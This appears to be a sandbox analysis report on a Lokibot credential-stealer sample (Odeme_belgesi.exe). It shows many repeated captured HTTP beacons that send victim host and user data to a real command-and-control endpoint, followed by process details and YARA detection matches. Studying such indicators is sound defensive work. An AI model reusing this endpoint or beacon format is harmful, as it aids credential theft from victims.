              Oct 1, 2024 10:56:44.250216961 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:44.963037014 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:17 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              89192.168.2.44982645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:45.119550943 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:45.124435902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:45.843538046 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:18 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              90192.168.2.44982745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:45.996553898 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:46.001924992 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:46.767757893 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:18 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              91192.168.2.44982845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:46.927398920 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:46.932311058 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:47.567887068 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:19 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              92192.168.2.44982945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:47.710268974 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:47.715173006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:48.474303007 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:20 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              93192.168.2.44983045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:48.651488066 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:48.656357050 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:49.332030058 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:21 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.44983145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:49.488979101 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:49.497277021 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:50.153675079 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:22 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.44983245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:50.310678005 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:50.315483093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:50.984432936 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:23 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.44983345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:51.134881973 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:51.139744043 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:51.880937099 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:24 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.44983445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:52.026005983 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:52.030834913 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:52.776621103 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:25 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.44983545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:52.928201914 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:52.933069944 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:53.772931099 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:25 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.44983645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:53.934497118 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:53.939405918 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:54.594682932 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:26 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.44983745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:54.745157957 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:54.751235008 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:55.409951925 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:27 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.44983845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:55.557056904 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:55.562072992 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:56.206754923 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:28 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.44983945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:56.348913908 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:56.353976965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:57.140919924 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:29 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.44984045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:57.291670084 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:57.296632051 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:57.970891953 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:30 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.44984145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:58.117475986 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:58.123183012 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:58.803797007 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:31 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.44984245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:59.234206915 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:59.239027023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:57:00.074596882 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:32 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.44984345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:57:00.230870962 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:57:00.235929012 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:57:01.013664961 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:33 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.44984445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:57:01.164479017 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:57:01.169312000 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:57:01.960577011 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:34 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:04:54:55
              Start date:01/10/2024
              Path:C:\Users\user\Desktop\Odeme_belgesi.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Odeme_belgesi.exe"
              Imagebase:0x5d0000
              File size:554'496 bytes
              MD5 hash:FC9C0D308E1E66CAF355A329F171362A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
